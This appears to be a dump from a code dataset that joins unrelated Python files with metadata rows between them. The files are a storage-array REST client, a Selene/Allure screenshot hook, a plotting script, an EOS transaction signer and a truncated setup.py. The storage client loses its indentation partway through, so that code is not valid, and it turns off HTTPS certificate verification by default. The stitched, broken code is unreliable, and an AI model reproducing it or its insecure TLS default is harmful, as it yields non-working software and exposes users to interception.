        "1.10",
        "1.9",
        "1.8",
        "1.7",
        "1.6",
        "1.5",
        "1.4",
        "1.3",
        "1.2",
        "1.1",
        "1.0",
    ]
    def __init__(self, target, username=None, password=None, api_token=None,
                 rest_version=None, verify_https=False, ssl_cert=None,
                 user_agent=None):
        """Create a client for the array at *target*.

        :param target: IP address or DNS name of the array.
        :param username: Username to log in with; must be paired with password.
        :param password: Password to log in with; must be paired with username.
        :param api_token: API token to log in with; mutually exclusive with
                          username/password.
        :param rest_version: REST API version to pin; when omitted the highest
                             mutually supported version is negotiated.
        :param verify_https: If True, verify the array's SSL certificate.
        :param ssl_cert: Path to a CA bundle to verify against.
        :param user_agent: Value to send in the User-Agent request header.
        :raises ValueError: If credentials are missing or over-specified.
        """
        if not api_token and not (username and password):
            raise ValueError(
                "Must specify API token or both username and password.")
        elif api_token and (username or password):
            raise ValueError(
                "Specify only API token or both username and password.")
        self._cookies = {}
        self._target = target
        # Only renegotiate on HTTP 450 when the caller did not pin a version.
        self._renegotiate_rest_version = False if rest_version else True
        self._verify_https = verify_https
        self._ssl_cert = ssl_cert
        self._user_agent = user_agent
        self._rest_version = rest_version
        if self._rest_version:
            # Pinned version: validate against library and array support.
            self._rest_version = self._check_rest_version(rest_version)
        else:
            self._rest_version = self._choose_rest_version()
        # Username/password logins are exchanged for an API token first.
        self._api_token = (api_token or self._obtain_api_token(username, password))
        self._start_session()
def _request(self, method, path, data=None, reestablish_session=True):
if path.startswith("https://"):
url = path
else:
url = "https://{0}/api/{1}/{2}".format(
self._target, self._rest_version, path)
headers = {"Content-Type": "application/json"}
if self._user_agent:
headers['User-Agent'] = self._user_agent
body = json.dumps(data).encode("utf-8")
verify = False
if self._verify_https:
if self._ssl_cert:
verify = self._ssl_cert
else:
verify = True
try:
response = requests.request(method, url, data=body, headers=headers,
cookies=self._cookies, verify=verify)
except requests.exceptions.RequestException as err:
raise PureError(err.message)
if response.status_code == 200:
if "application/json" in response.headers.get("Content-Type", ""):
if response.cookies:
self._cookies.update(response.cookies)
else:
self._cookies.clear()
content = response.json()
if isinstance(content, list):
content = ResponseList(content)
elif isinstance(content, dict):
content = ResponseDict(content)
content.headers = response.headers
return content
raise PureError("Response not in JSON: " + response.text)
elif response.status_code == 401 and reestablish_session:
self._start_session()
return self._request(method, path, data, False)
elif response.status_code == 450 and self._renegotiate_rest_version:
old_version = self._rest_version
self._rest_version = self._choose_rest_version()
if old_version == self._rest_version:
raise PureHTTPError(self._target, str(self._rest_version), response)
return self._request(method, path, data, reestablish_session)
else:
raise PureHTTPError(self._target, str(self._rest_version), response)
def _check_rest_version(self, version):
version = str(version)
if version not in self.supported_rest_versions:
msg = "Library is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
array_rest_versions = self._list_available_rest_versions()
if version not in array_rest_versions:
msg = "Array is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
return LooseVersion(version)
def _choose_rest_version(self):
versions = self._list_available_rest_versions()
versions = [LooseVersion(x) for x in versions if x in self.supported_rest_versions]
if versions:
return max(versions)
else:
raise PureError(
"Library is incompatible with all REST API versions supported"
"by the target array.")
def _list_available_rest_versions(self):
url = "https://{0}/api/api_version".format(self._target)
data = self._request("GET", url, reestablish_session=False)
return data["version"]
def _obtain_api_token(self, username, password):
data = self._request("POST", "auth/apitoken",
{"username": username, "password": password},
reestablish_session=False)
return data["api_token"]
def _start_session(self):
self._request("POST", "auth/session", {"api_token": self._api_token},
reestablish_session=False)
def get_rest_version(self):
return str(self._rest_version)
def invalidate_cookie(self):
self._request("DELETE", "auth/session")
def _set_console_lock(self, **kwargs):
return self._request("PUT", "array/console_lock", kwargs)
def enable_console_lock(self):
return self._set_console_lock(enabled=True)
def disable_console_lock(self):
return self._set_console_lock(enabled=False)
def get(self, **kwargs):
return self._request("GET", "array", kwargs)
def get_console_lock_status(self):
return self._request("GET", "array/console_lock")
def rename(self, name):
return self.set(name=name)
def set(self, **kwargs):
return self._request("PUT", "array", kwargs)
def _set_volume(self, volume, **kwargs):
return self._request("PUT", "volume/{0}".format(volume), kwargs)
def create_snapshot(self, volume, **kwargs):
return self.create_snapshots([volume], **kwargs)[0]
def create_snapshots(self, volumes, **kwargs):
data = {"source": volumes, "snap": True}
data.update(kwargs)
return self._request("POST", "volume", data)
def create_volume(self, volume, size):
return self._request("POST", "volume/{0}".format(volume), {"size":size})
def copy_volume(self, source, dest, **kwargs):
data = {"source": source}
data.update(kwargs)
return self._request("POST", "volume/{0}".format(dest), data)
def destroy_volume(self, volume):
return self._request("DELETE", "volume/{0}".format(volume))
def eradicate_volume(self, volume):
return self._request("DELETE", "volume/{0}".format(volume),
{"eradicate": True})
def extend_volume(self, volume, size):
return self._set_volume(volume, size=size, truncate=False)
def get_volume(self, volume, **kwargs):
return self._request("GET", "volume/{0}".format(volume), kwargs)
def add_volume(self, volume, pgroup):
return self._request("POST", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def remove_volume(self, volume, pgroup):
return self._request("DELETE", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def list_volume_block_differences(self, volume, **kwargs):
return self._request("GET", "volume/{0}/diff".format(volume), kwargs)
def list_volume_private_connections(self, volume, **kwargs):
return self._request("GET", "volume/{0}/host".format(volume), kwargs)
def list_volume_shared_connections(self, volume, **kwargs):
return self._request("GET", "volume/{0}/hgroup".format(volume), kwargs)
def list_volumes(self, **kwargs):
return self._request("GET", "volume", kwargs)
def rename_volume(self, volume, name):
return self._set_volume(volume, name=name)
def recover_volume(self, volume):
return self._set_volume(volume, action="recover")
def truncate_volume(self, volume, size):
return self._set_volume(volume, size=size, truncate=True)
def connect_host(self, host, volume, **kwargs):
return self._request(
"POST", "host/{0}/volume/{1}".format(host, volume), kwargs)
def create_host(self, host, **kwargs):
return self._request("POST", "host/{0}".format(host), kwargs)
def delete_host(self, host):
return self._request("DELETE", "host/{0}".format(host))
def disconnect_host(self, host, volume):
return self._request("DELETE", "host/{0}/volume/{1}".format(host,
volume))
def get_host(self, host, **kwargs):
return self._request("GET", "host/{0}".format(host), kwargs)
def add_host(self, host, pgroup):
return self._request("POST", "host/{0}/pgroup/{1}".format(host, pgroup))
def remove_host(self, host, pgroup):
return self._request("DELETE", "host/{0}/pgroup/{1}".format(host, pgroup))
def list_host_connections(self, host, **kwargs):
return self._request("GET", "host/{0}/volume".format(host), kwargs)
def list_hosts(self, **kwargs):
return self._request("GET", "host", kwargs)
def rename_host(self, host, name):
return self.set_host(host, name=name)
def set_host(self, host, **kwargs):
return self._request("PUT", "host/{0}".format(host), kwargs)
def connect_hgroup(self, hgroup, volume, **kwargs):
return self._request(
"POST", "hgroup/{0}/volume/{1}".format(hgroup, volume), kwargs)
def create_hgroup(self, hgroup, **kwargs):
return self._request("POST", "hgroup/{0}".format(hgroup), kwargs)
def delete_hgroup(self, hgroup):
return self._request("DELETE", "hgroup/{0}".format(hgroup))
def disconnect_hgroup(self, hgroup, volume):
return self._request("DELETE",
"hgroup/{0}/volume/{1}".format(hgroup, volume))
def get_hgroup(self, hgroup, **kwargs):
return self._request("GET", "hgroup/{0}".format(hgroup), kwargs)
def add_hgroup(self, hgroup, pgroup):
return self._request("POST", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def remove_hgroup(self, hgroup, pgroup):
return self._request("DELETE", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def list_hgroup_connections(self, hgroup):
return self._request("GET", "hgroup/{0}/volume".format(hgroup))
def list_hgroups(self, **kwargs):
return self._request("GET", "hgroup", kwargs)
def rename_hgroup(self, hgroup, name):
return self.set_hgroup(hgroup, name=name)
def set_hgroup(self, hgroup, **kwargs):
return self._request("PUT", "hgroup/{0}".format(hgroup), kwargs)
def disable_network_interface(self, interface):
return self.set_network_interface(interface, enabled=False)
def enable_network_interface(self, interface):
return self.set_network_interface(interface, enabled=True)
def get_network_interface(self, interface):
return self._request("GET", "network/{0}".format(interface))
def list_network_interfaces(self):
return self._request("GET", "network")
def set_network_interface(self, interface, **kwargs):
return self._request("PUT", "network/{0}".format(interface), kwargs)
def create_subnet(self, subnet, prefix, **kwargs):
data = {"prefix": prefix}
data.update(kwargs)
return self._request("POST", "subnet/{0}".format(subnet), data)
def delete_subnet(self, subnet):
return self._request("DELETE", "subnet/{0}".format(subnet))
def disable_subnet(self, subnet):
return self.set_subnet(subnet, enabled=False)
def enable_subnet(self, subnet):
return self.set_subnet(subnet, enabled=True)
def get_subnet(self, subnet):
return self._request("GET", "subnet/{0}".format(subnet))
def list_subnets(self, **kwargs):
return self._request("GET", "subnet", kwargs)
def rename_subnet(self, subnet, name):
return self.set_subnet(subnet, name=name)
def set_subnet(self, subnet, **kwargs):
return self._request("PUT", "subnet/{0}".format(subnet), kwargs)
def create_vlan_interface(self, interface, subnet, **kwargs):
data = {"subnet": subnet}
data.update(kwargs)
return self._request("POST", "network/vif/{0}".format(interface), data)
def delete_vlan_interface(self, interface):
return self._request("DELETE", "network/{0}".format(interface))
def get_dns(self):
return self._request("GET", "dns")
def set_dns(self, **kwargs):
return self._request("PUT", "dns", kwargs)
def list_ports(self, **kwargs):
return self._request("GET", "port", kwargs)
def get_drive(self, drive):
return self._request("GET", "drive/{0}".format(drive))
def list_drives(self):
return self._request("GET", "drive")
def get_hardware(self, component, **kwargs):
return self._request("GET", "hardware/{0}".format(component), kwargs)
def list_hardware(self, **kwargs):
return self._request("GET", "hardware", kwargs)
def set_hardware(self, component, **kwargs):
return self._request("PUT", "hardware/{0}".format(component), kwargs)
def _list_admin(self, **kwargs):
return self._request("GET", "admin", kwargs)
def _set_admin(self, admin, **kwargs):
return self._request("PUT", "admin/{0}".format(admin), kwargs)
def create_api_token(self, admin, **kwargs):
return self._request("POST", "admin/{0}/apitoken".format(admin), kwargs)
def delete_api_token(self, admin):
return self._request("DELETE", "admin/{0}/apitoken".format(admin))
def get_publickey(self, admin):
return self._request("GET", "admin/{0}".format(admin),
{"publickey": True})
def get_api_token(self, admin, **kwargs):
return self._request("GET", "admin/{0}/apitoken".format(admin))
def list_publickeys(self):
return self._list_admin(publickey=True)
def list_api_tokens(self, **kwargs):
return self._list_admin(api_token=True, **kwargs)
def refresh_admin(self, admin, **kwargs):
return self._set_admin(admin, action="refresh", **kwargs)
def refresh_admins(self):
return self._request("PUT", "admin",
{"action": "refresh", "clear": True})
def set_publickey(self, admin, key):
return self._set_admin(admin, publickey=key)
def set_password(self, admin, new_password, old_password):
return self._set_admin(admin, password=new_password,
old_password=old_password)
def disable_directory_service(self, check_peer=False):
if check_peer:
return self.set_directory_service(check_peer=False)
return self.set_directory_service(enabled=False)
def enable_directory_service(self, check_peer=False):
if check_peer:
return self.set_directory_service(check_peer=True)
return self.set_directory_service(enabled=True)
def get_directory_service(self, **kwargs):
return self._request("GET", "directoryservice", kwargs)
def set_directory_service(self, **kwargs):
return self._request("PUT", "directoryservice", kwargs)
def test_directory_service(self):
return self.set_directory_service(action="test")
def _set_phonehome(self, **kwargs):
return self._request("PUT", "array/phonehome", kwargs)
def _set_remote_assist(self, **kwargs):
return self._request("PUT", "array/remoteassist", kwargs)
def disable_phonehome(self):
return self._set_phonehome(enabled=False)
def disable_remote_assist(self):
return self._set_remote_assist(action="disconnect")
def enable_phonehome(self):
return self._set_phonehome(enabled=True)
def enable_remote_assist(self):
return self._set_remote_assist(action="connect")
def get_manual_phonehome_status(self):
return self._request("GET", "array/phonehome")
def get_phonehome(self):
return self.get(phonehome=True)
def get_remote_assist_status(self):
return self._request("GET", "array/remoteassist")
def phonehome(self, action):
return self._set_phonehome(action=action)
def _set_alert_recipient(self, address, **kwargs):
return self._request("PUT", "alert/{0}".format(address), kwargs)
def _set_message(self, message_id, **kwargs):
return self._request("PUT", "message/{0}".format(message_id), kwargs)
def clear_message(self, message_id):
return self._set_message(message_id, flagged=False)
def create_alert_recipient(self, address):
return self._request("POST", "alert/{0}".format(address))
def delete_alert_recipient(self, address):
return self._request("DELETE", "alert/{0}".format(address))
def disable_alert_recipient(self, address):
return self._set_alert_recipient(address, enabled=False)
def enable_alert_recipient(self, address):
return self._set_alert_recipient(address, enabled=True)
def flag_message(self, message_id):
return self._set_message(message_id, flagged=True)
def get_alert_recipient(self, address):
return self._request("GET", "alert/{0}".format(address))
def list_alert_recipients(self):
return self._request("GET", "alert")
def list_messages(self, **kwargs):
return self._request("GET", "message", kwargs)
def test_alert(self):
return self._request("PUT", "alert", {"action": "test"})
def test_alert_recipient(self, address):
return self._set_alert_recipient(address, action="test")
def create_snmp_manager(self, manager, host, **kwargs):
data = {"host": host}
data.update(kwargs)
return self._request("POST", "snmp/{0}".format(manager), data)
def delete_snmp_manager(self, manager):
return self._request("DELETE", "snmp/{0}".format(manager))
def get_snmp_engine_id(self):
return self._request("GET", "snmp", {"engine_id": True})
def get_snmp_manager(self, manager):
return self._request("GET", "snmp/{0}".format(manager))
def list_snmp_managers(self):
return self._request("GET", "snmp")
def rename_snmp_manager(self, manager, name):
return self.set_snmp_manager(manager, name=name)
def set_snmp_manager(self, manager, **kwargs):
return self._request("PUT", "snmp/{0}".format(manager), kwargs)
def test_snmp_manager(self, manager):
return self.set_snmp_manager(manager, action="test")
def connect_array(self, address, connection_key, connection_type, **kwargs):
data = {"address": address,
"connection_key": connection_key,
"type": connection_type}
data.update(kwargs)
return self._request("POST", "array/connection", data)
def disconnect_array(self, address):
return self._request("DELETE",
"array/connection/{0}".format(address))
def list_array_connections(self, **kwargs):
return self._request("GET", "array/connection", kwargs)
def throttle_array_connection(self, address, **kwargs):
return self._request("PUT", "array/connection/{0}".format(address), kwargs)
def create_pgroup(self, pgroup, **kwargs):
return self._request("POST", "pgroup/{0}".format(pgroup), kwargs)
def create_pgroup_snapshot(self, source, **kwargs):
result = self.create_pgroup_snapshots([source], **kwargs)
if self._rest_version >= LooseVersion("1.4"):
headers = result.headers
result = ResponseDict(result[0])
result.headers = headers
return result
def create_pgroup_snapshots(self, sources, **kwargs):
data = {"source": sources, "snap": True}
data.update(kwargs)
return self._request("POST", "pgroup", data)
def destroy_pgroup(self, pgroup):
return self._request("DELETE", "pgroup/{0}".format(pgroup))
def disable_pgroup_replication(self, pgroup):
return self.set_pgroup(pgroup, replicate_enabled=False)
def enable_pgroup_replication(self, pgroup):
return self.set_pgroup(pgroup, replicate_enabled=True)
def disable_pgroup_snapshots(self, pgroup):
return self.set_pgroup(pgroup, snap_enabled=False)
def enable_pgroup_snapshots(self, pgroup):
return self.set_pgroup(pgroup, snap_enabled=True)
def eradicate_pgroup(self, pgroup):
return self._request("DELETE", "pgroup/{0}".format(pgroup),
{"eradicate": True})
def get_pgroup(self, pgroup, **kwargs):
return self._request("GET", "pgroup/{0}".format(pgroup), kwargs)
def list_pgroups(self, **kwargs):
return self._request("GET", "pgroup", kwargs)
def recover_pgroup(self, pgroup):
return self.set_pgroup(pgroup, action="recover")
def rename_pgroup(self, pgroup, name):
return self.set_pgroup(pgroup, name=name)
def set_pgroup(self, pgroup, **kwargs):
return self._request("PUT", "pgroup/{0}".format(pgroup), kwargs)
def get_certificate(self, **kwargs):
return self._request("GET", "cert", kwargs)
def get_certificate_signing_request(self, **kwargs):
return self._request("GET", "cert/certificate_signing_request", kwargs)
def set_certificate(self, **kwargs):
return self._request("PUT", "cert", kwargs)
@staticmethod
def page_through(page_size, function, *args, **kwargs):
kwargs["limit"] = page_size
def get_page(token):
page_kwargs = kwargs.copy()
if token:
page_kwargs["token"] = token
return function(*args, **page_kwargs)
def page_generator():
token = None
while True:
try:
response = get_page(token)
token = response.headers.get("x-next-token")
except PureError as err:
yield None, err
else:
if response:
sent_token = yield response, None
if sent_token is not None:
token = sent_token
else:
return
return page_generator()
def get_app(self, app):
return self._request("GET", "app/{0}".format(app))
def list_apps(self, **kwargs):
return self._request("GET", "app", kwargs)
class ResponseList(list):
    """A list of REST results that also carries the HTTP response headers."""

    def __init__(self, l=()):
        # Start with no header information; the requesting code fills
        # ``headers`` in after construction.
        self.headers = {}
        super(ResponseList, self).__init__(l)
class ResponseDict(dict):
    """A dict of REST results that also carries the HTTP response headers."""

    def __init__(self, d=()):
        # Headers start empty; the requesting code assigns them afterwards.
        self.headers = {}
        super(ResponseDict, self).__init__(d)
class PureError(Exception):
    """Base exception for all errors raised by this module."""

    def __init__(self, reason):
        super(PureError, self).__init__()
        # Human-readable description of what went wrong.
        self.reason = reason

    def __str__(self):
        return "PureError: {0}".format(self.reason)
class PureHTTPError(PureError):
    """Error raised when the array answers with an HTTP error status.

    Exposes the failing request's context: ``target``, ``rest_version``,
    ``code``, ``headers`` and the response body ``text``.
    """

    def __init__(self, target, rest_version, response):
        # Seed the base-class reason from the HTTP reason phrase, then
        # copy the relevant response fields onto this exception.
        super(PureHTTPError, self).__init__(response.reason)
        self.text = response.text
        self.headers = response.headers
        self.code = response.status_code
        self.rest_version = rest_version
        self.target = target

    def __str__(self):
        template = ("PureHTTPError status code {0} returned by REST "
                    "version {1} at {2}: {3}\n{4}")
        return template.format(self.code, self.rest_version, self.target,
                               self.reason, self.text)
| true | true |
f7325d5471f3864ebbc211b12867d82ff5de718c | 1,304 | py | Python | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | import allure
from selene.core.exceptions import TimeoutException
from selene.support.shared import browser
def attach_snapshots_on_failure(error: TimeoutException) -> Exception:
    """
    Selene ``hook_wait_failure`` implementation that attaches snapshots
    (a screenshot and the page source, when available) to the failed test
    step in the Allure report, then passes the original error through.

    Usually this is not needed: a ``pytest_runtest_makereport`` hook can
    attach screenshots to the test body itself, which is handier when
    analysing the report.  If step-level attachments are wanted, enable
    this hook in your browser setup fixture::

        import web_test
        browser.config.hook_wait_failure = \
            web_test.assist.selene.shared.hook.attach_snapshots_on_failure

    Otherwise it can be skipped ;)
    """
    # Snapshot sources paired with their attachment name and MIME type;
    # either source may be empty/None when Selene captured nothing.
    snapshots = (
        (browser.config.last_screenshot,
         'screenshot on failure',
         allure.attachment_type.PNG),
        (browser.config.last_page_source,
         'page source on failure',
         allure.attachment_type.HTML),
    )
    for source, name, attachment_type in snapshots:
        if source:
            allure.attach.file(source=source,
                               name=name,
                               attachment_type=attachment_type)
    return error
| 37.257143 | 87 | 0.696319 | import allure
from selene.core.exceptions import TimeoutException
from selene.support.shared import browser
def attach_snapshots_on_failure(error: TimeoutException) -> Exception:
    """Selene ``hook_wait_failure`` hook: attach a screenshot and the page
    source (when available) to the failing Allure step, then return the
    original error unchanged so Selene can re-raise it."""
    # ``last_screenshot``/``last_page_source`` come from selene's shared
    # browser config; either may be empty/None when nothing was captured.
    last_screenshot = browser.config.last_screenshot
    if last_screenshot:
        allure.attach.file(source=last_screenshot,
                           name='screenshot on failure',
                           attachment_type=allure.attachment_type.PNG)
    last_page_source = browser.config.last_page_source
    if last_page_source:
        allure.attach.file(source=last_page_source,
                           name='page source on failure',
                           attachment_type=allure.attachment_type.HTML)
    return error
| true | true |
f7325e38e6b3e37a43fb029d0d2a6c0bc984703c | 1,956 | py | Python | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
x=np.arange(50)
y=np.array([-59.00138158129509,
-43.966695525591895,
-52.5277642686108,
-32.1793153104166,
-37.81484603001339,
-24.97787027415733,
-20.170115700140766,
-19.194577812051865,
-24.267556747544734,
-18.56846706310683,
-24.168507205879642,
-21.613453728913854,
-19.833679338413056,
-16.78310378266553,
-15.692655896866523,
-15.496178593312704,
-15.23787215267857,
-14.754095951096263,
-12.79724037524585,
-11.496812508420765,
-11.593305322673082,
-12.144980726639616,
-11.889169042516812,
-10.983010599192548,
-10.751331950717917,
-10.887445777009278,
-10.94197566653676,
-10.983575687515879,
-10.315668585661115,
-10.200188159394665,
-10.2623815297516,
-9.98878690162022,
-9.664489111145294,
-9.798550374351311,
-9.66769644336881,
-9.114549499466483,
-9.259332831572362,
-9.175694376996443,
-9.415038345909062,
-9.50191440403006,
-9.36517394141991,
-9.244892043097575,
-9.220243263930586,
-9.160062939634974,
-9.293750423507198,
-9.189954421974406,
-9.125946744761388,
-9.182482014624696,
-9.135265034880312,
-9.35027383852138])
plt.plot()
plt.plot(x,y) | 33.152542 | 37 | 0.463701 | import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
    # x: generation indices 0..49; y: hard-coded per-generation SAC
    # performance values, presumably recorded from an offline tuning
    # run (TODO confirm provenance of these numbers).
    x=np.arange(50)
    y=np.array([-59.00138158129509,
                -43.966695525591895,
                -52.5277642686108,
                -32.1793153104166,
                -37.81484603001339,
                -24.97787027415733,
                -20.170115700140766,
                -19.194577812051865,
                -24.267556747544734,
                -18.56846706310683,
                -24.168507205879642,
                -21.613453728913854,
                -19.833679338413056,
                -16.78310378266553,
                -15.692655896866523,
                -15.496178593312704,
                -15.23787215267857,
                -14.754095951096263,
                -12.79724037524585,
                -11.496812508420765,
                -11.593305322673082,
                -12.144980726639616,
                -11.889169042516812,
                -10.983010599192548,
                -10.751331950717917,
                -10.887445777009278,
                -10.94197566653676,
                -10.983575687515879,
                -10.315668585661115,
                -10.200188159394665,
                -10.2623815297516,
                -9.98878690162022,
                -9.664489111145294,
                -9.798550374351311,
                -9.66769644336881,
                -9.114549499466483,
                -9.259332831572362,
                -9.175694376996443,
                -9.415038345909062,
                -9.50191440403006,
                -9.36517394141991,
                -9.244892043097575,
                -9.220243263930586,
                -9.160062939634974,
                -9.293750423507198,
                -9.189954421974406,
                -9.125946744761388,
                -9.182482014624696,
                -9.135265034880312,
                -9.35027383852138])
    # NOTE(review): the argument-less plt.plot() below draws nothing and is
    # likely leftover; also no plt.show()/savefig follows, so the figure is
    # only visible in interactive sessions.
    plt.plot()
    plt.plot(x,y)
f7325e94e83568ba3af3aaa3e3f4c4a03332c471 | 1,351 | py | Python | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | null | null | null | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | null | null | null | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | 1 | 2022-01-21T04:09:52.000Z | 2022-01-21T04:09:52.000Z | import datetime as dt
from requests import HTTPError
import eospy.cleos
import eospy.keys
import pytz
from settings import user_param
def push_transaction(params_json):
    """Sign and broadcast an EOS-style transaction described by ``params_json``.

    ``params_json`` must contain a single action under
    ``params_json['actions'][0]`` with ``account``, ``name``,
    ``authorization`` and JSON ``data`` fields.

    :returns: ``(True, response)`` on success, or ``(False, error_text)``
        when the RPC endpoint rejects the transaction with an HTTP error.
    """
    ce = eospy.cleos.Cleos(url=user_param.rpc_domain)
    action = params_json['actions'][0]
    arguments = action['data']
    payload = {
        "account": action['account'],
        "name": action['name'],
        "authorization": action['authorization'],
    }
    # The chain expects action data in binary form; convert via the ABI
    # and insert the binary blob as the "data" field of the payload.
    data = ce.abi_json_to_bin(payload['account'], payload['name'], arguments)
    payload['data'] = data['binargs']
    trx = {"actions": [payload]}
    # Give the transaction a 60-second lifetime.  ``datetime.utcnow`` is
    # deprecated (and discouraged on Python 3.12+); build an aware UTC
    # timestamp directly — the resulting string is identical.
    trx['expiration'] = str(dt.datetime.now(pytz.UTC) + dt.timedelta(seconds=60))
    # Sign with the configured private key (a string would also work).
    key = eospy.keys.EOSKey(user_param.private_key)
    try:
        resp = ce.push_transaction(trx, key, broadcast=True)
        return True, resp
    except HTTPError as e:
        return False, str(e)
| 33.775 | 83 | 0.679497 | import datetime as dt
from requests import HTTPError
import eospy.cleos
import eospy.keys
import pytz
from settings import user_param
def push_transaction(params_json):
    """Sign and broadcast a transaction described by ``params_json``.

    ``params_json['actions'][0]`` must provide ``account``, ``name``,
    ``authorization`` and JSON ``data``.  Returns ``(True, response)`` on
    success or ``(False, error_text)`` on an HTTP error from the endpoint.
    """
    ce = eospy.cleos.Cleos(url=user_param.rpc_domain)
    arguments = params_json['actions'][0]['data']
    payload = {
        "account": params_json['actions'][0]['account'],
        "name": params_json['actions'][0]['name'],
        "authorization": params_json['actions'][0]['authorization'],
    }
    # The chain expects action data in binary form; convert via the ABI.
    data = ce.abi_json_to_bin(payload['account'], payload['name'], arguments)
    payload['data'] = data['binargs']
    trx = {"actions": [payload]}
    # 60-second transaction lifetime.
    # NOTE(review): datetime.utcnow() is deprecated; consider
    # dt.datetime.now(pytz.UTC) instead.
    trx['expiration'] = str(
        (dt.datetime.utcnow() + dt.timedelta(seconds=60)).replace(tzinfo=pytz.UTC))
    key = eospy.keys.EOSKey(user_param.private_key)
    try:
        resp = ce.push_transaction(trx, key, broadcast=True)
        return True, resp
    except HTTPError as e:
        return False, str(e)
f7325f7757fea1fb00807643e7b1200d995cc928 | 2,142 | py | Python | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 19 | 2015-09-03T12:38:40.000Z | 2021-01-06T09:38:27.000Z | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 2 | 2015-09-01T15:08:14.000Z | 2015-11-16T13:38:36.000Z | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 5 | 2015-10-09T22:03:59.000Z | 2018-05-25T08:32:32.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import, print_function
import io
import os
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import relpath
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
    """Return the text of the file at ``*names``, relative to this script.

    :param names: path components joined onto the directory of setup.py.
    :param kwargs: ``encoding`` may override the default ``'utf8'``.
    """
    # Use a context manager so the file handle is closed promptly
    # (the original left the handle to the garbage collector).
    with io.open(
        join(dirname(__file__), *names),
        encoding=kwargs.get('encoding', 'utf8')
    ) as handle:
        return handle.read()
# Test-only dependencies, also exposed via the ``tests`` extra below.
tests_require = ['nose']

setup(
    name='absorbing_centrality',
    version='0.1.0',
    license='ISC',
    author='Charalampos Mavroforakis',
    author_email='cmav@bu.edu',
    url='https://github.com/harrymvr/absorbing-centrality',
    description='An implementation of the absorbing random-walk centrality measure for graphs.',
    # README plus the changelog (with sphinx roles such as :func:`x`
    # rewritten to plain ``x`` literals) form the PyPI long description.
    long_description='%s\n%s' % (
        read('README.rst'),
        re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst')),
    ),
    packages=['absorbing_centrality'],
    include_package_data=True,
    zip_safe=False,
    test_suite='nose.collector',
    # Complete classifier list:
    # http://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Operating System :: Unix',
        'Operating System :: POSIX',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'License :: OSI Approved :: ISC License (ISCL)',
        'Topic :: Scientific/Engineering :: Information Analysis',
        'Natural Language :: English',
    ],
    keywords=[
        'graph mining',
        'node centrality',
        'random walks',
        'algorithms',
        'data mining',
    ],
    install_requires=[
        'networkx>=1.9.1',
        'numpy==1.9.2',
        'scipy==0.16',
    ],
    extras_require={
        'tests': tests_require,
    },
)
| 31.970149 | 116 | 0.641457 |
from __future__ import absolute_import, print_function
import io
import os
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import relpath
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
    """Return the text of the file at ``*names``, relative to setup.py.

    ``encoding`` may be overridden via keyword argument (default 'utf8').
    """
    # NOTE(review): the handle returned by io.open is never explicitly
    # closed; a ``with`` block would be safer.
    return io.open(
        join(dirname(__file__), *names),
        encoding=kwargs.get('encoding', 'utf8')
    ).read()
# Test-only dependencies, also exposed through the ``tests`` extra.
tests_require = ['nose']

# README followed by the changelog, with sphinx cross-reference roles
# (e.g. :func:`foo`) downgraded to plain ``foo`` literals for PyPI.
_long_description = '%s\n%s' % (
    read('README.rst'),
    re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst')),
)

setup(
    name='absorbing_centrality',
    version='0.1.0',
    license='ISC',
    description='An implementation of the absorbing random-walk centrality measure for graphs.',
    long_description=_long_description,
    author='Charalampos Mavroforakis',
    author_email='cmav@bu.edu',
    url='https://github.com/harrymvr/absorbing-centrality',
    packages=['absorbing_centrality'],
    include_package_data=True,
    zip_safe=False,
    test_suite='nose.collector',
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Operating System :: Unix',
        'Operating System :: POSIX',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
